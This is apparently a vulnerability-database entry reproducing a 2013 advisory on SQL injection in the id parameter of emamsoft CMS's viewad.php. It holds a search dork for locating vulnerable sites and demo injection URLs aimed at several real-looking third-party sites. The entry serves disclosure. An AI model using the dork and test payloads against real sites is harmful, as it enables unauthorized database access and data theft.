emamsoft CMS SQL injection vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044680 漏洞类型
发布时间 2013-08-01 更新时间 2013-08-01
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013080011
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#######################################################
# Exploit Title : emamsoft.com CMS SQL injection vulnerability
# Exploit Author : Ashiyane Digital Security Team
# Vendor Home : http://www.emamsoft.com/
# Date : 2013/7/31
# Dork : intext:"Powerd By emamsoft.com"
# AVN : ASH-2013-134
#######################################################
# Vulnerability Detail :
#       the id parameter in viewad.php page is vulnerable to SQLi
#       attack.
#   http://[site]/viewad.php?id=[SQL]
#######################################################
#Demo:
#
# http://aqaar.emXoft.net/viewad.php?id=20%27
#
# http://www.eleXad.com/viewad.php?id=107%27
#
# http://www.farXna.com/viewad.php?id=7%27
#
# http://www.3Xark.com/viewad.php?id=17%27
#
#######################################################
# TimeLine :            2013/7/31 - vulnerability discovered
#                               2013/7/31 - vendor notified
#                               2013/7/31 - vendor replied about fixing
#                               2013/8/01 - vulnerability disclosed
#######################################################
# Greetz To My Lord Allah
# Discovered by AbolfazlKHAAN
#
# Spc Tnx To : PrinceofHacking , C4t , HamidX9 , Milad Hacking and all Ashiyane Researchers ...
#######################################################